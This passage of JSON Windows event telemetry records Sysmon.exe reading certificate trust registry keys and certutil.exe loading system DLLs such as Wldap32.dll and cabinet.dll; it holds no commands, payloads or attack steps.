"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573497300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573497300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573497300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573497300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573497300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573497300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573497300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "Wldap32.dll", - "image_path": "C:\\Windows\\System32\\Wldap32.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573496670000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573497450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573497450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573497450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573497450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573497450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573497450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573497450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573497450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573497450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573497450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573497450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573497450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573497450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573497450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573497450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573497450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573497450016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "cabinet.dll", - "image_path": "C:\\Windows\\System32\\cabinet.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573496670000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "normaliz.dll", - "image_path": "C:\\Windows\\System32\\normaliz.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573496830000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573497610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 